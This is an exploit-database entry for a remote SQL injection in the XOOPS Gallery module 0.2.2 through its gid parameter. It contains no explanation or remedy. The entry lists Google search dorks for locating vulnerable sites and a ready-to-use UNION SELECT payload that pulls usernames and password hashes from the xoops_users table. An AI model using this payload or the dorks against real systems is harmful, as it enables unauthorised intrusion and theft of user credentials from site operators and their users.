id: 2731
date: 03/12/2008
title: XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

===================================================================
XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability
===================================================================



##########################################
#
# XOOPS Module Gallery 0.2.2 SQL Injection Exploit
#
###########################################
#
# DORKS 1 : allinurl :"modules/gallery"
#
# DORK 2 : allinurl :"modules/gallery"gid
#
###########################################
EXPLOIT :

modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*





#  0day.today [2023-03-22]  #